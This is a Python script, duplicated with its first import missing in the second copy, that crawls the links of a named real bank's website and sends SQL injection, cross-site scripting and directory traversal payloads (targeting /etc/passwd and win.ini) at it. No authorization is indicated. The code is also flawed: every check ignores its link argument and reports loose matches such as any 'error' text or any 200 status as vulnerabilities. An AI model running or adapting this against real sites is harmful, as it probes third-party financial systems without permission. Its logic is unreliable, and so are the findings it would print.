import requests
from bs4 import BeautifulSoup
from urllib.parse import urljoin
# URL of the website
base_url = 'https://www.chase.com/'
# Make a GET request to the website
response = requests.get(base_url)
# Check for SQL injection vulnerabilities
def check_sql_injection(url):
# Test URLs with SQL injection payloads
sql_injection_payloads = [
"' OR 1=1--",
"' OR '1'='1",
"' OR ''='",
"' OR 1=1/*",
"' OR 'x'='x",
"' OR 'x'='x'/*",
"' OR 'y'='y",
"' OR 'y'='y'/*",
"' OR 'z'='z",
"' OR 'z'='z'/*",
"' OR 'a'='a",
"' OR 'a'='a'/*"
]
for payload in sql_injection_payloads:
# Inject the payload into the URL
test_url = urljoin(base_url, payload)
response = requests.get(test_url)
if 'SQL syntax' in response.text or 'error' in response.text:
print(f"Potential SQL injection vulnerability found: {test_url}")
# Check for XSS vulnerabilities
def check_xss(url):
# Test URLs with XSS payloads
xss_payloads = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"<svg/onload=alert('XSS')>"
]
for payload in xss_payloads:
# Inject the payload into the URL
test_url = urljoin(base_url, payload)
response = requests.get(test_url)
if payload in response.text:
print(f"Potential XSS vulnerability found: {test_url}")
# Check for directory traversal vulnerabilities
def check_directory_traversal(url):
# Test URLs with directory traversal payloads
directory_traversal_payloads = [
"../../../../etc/passwd",
"../../../../windows/win.ini",
"../../../../../../etc/passwd",
"../../../../../../windows/win.ini"
]
for payload in directory_traversal_payloads:
# Inject the payload into the URL
test_url = urljoin(base_url, payload)
response = requests.get(test_url)
if response.status_code == 200:
print(f"Potential directory traversal vulnerability found: {test_url}")
# Parse the HTML content
soup = BeautifulSoup(response.text, 'html.parser')
# Extract links from the HTML content
links = [link.get('href') for link in soup.find_all('a')]
# Check vulnerabilities in each link
for link in links:
if link:
check_sql_injection(link)
check_xss(link)
check_directory_traversal(link)
from bs4 import BeautifulSoup
from urllib.parse import urljoin
# URL of the website
base_url = 'https://www.chase.com/'
# Make a GET request to the website
response = requests.get(base_url)
# Check for SQL injection vulnerabilities
def check_sql_injection(url):
# Test URLs with SQL injection payloads
sql_injection_payloads = [
"' OR 1=1--",
"' OR '1'='1",
"' OR ''='",
"' OR 1=1/*",
"' OR 'x'='x",
"' OR 'x'='x'/*",
"' OR 'y'='y",
"' OR 'y'='y'/*",
"' OR 'z'='z",
"' OR 'z'='z'/*",
"' OR 'a'='a",
"' OR 'a'='a'/*"
]
for payload in sql_injection_payloads:
# Inject the payload into the URL
test_url = urljoin(base_url, payload)
response = requests.get(test_url)
if 'SQL syntax' in response.text or 'error' in response.text:
print(f"Potential SQL injection vulnerability found: {test_url}")
# Check for XSS vulnerabilities
def check_xss(url):
# Test URLs with XSS payloads
xss_payloads = [
"<script>alert('XSS')</script>",
"<img src=x onerror=alert('XSS')>",
"<svg/onload=alert('XSS')>"
]
for payload in xss_payloads:
# Inject the payload into the URL
test_url = urljoin(base_url, payload)
response = requests.get(test_url)
if payload in response.text:
print(f"Potential XSS vulnerability found: {test_url}")
# Check for directory traversal vulnerabilities
def check_directory_traversal(url):
# Test URLs with directory traversal payloads
directory_traversal_payloads = [
"../../../../etc/passwd",
"../../../../windows/win.ini",
"../../../../../../etc/passwd",
"../../../../../../windows/win.ini"
]
for payload in directory_traversal_payloads:
# Inject the payload into the URL
test_url = urljoin(base_url, payload)
response = requests.get(test_url)
if response.status_code == 200:
print(f"Potential directory traversal vulnerability found: {test_url}")
# Parse the HTML content
soup = BeautifulSoup(response.text, 'html.parser')
# Extract links from the HTML content
links = [link.get('href') for link in soup.find_all('a')]
# Check vulnerabilities in each link
for link in links:
if link:
check_sql_injection(link)
check_xss(link)
check_directory_traversal(link)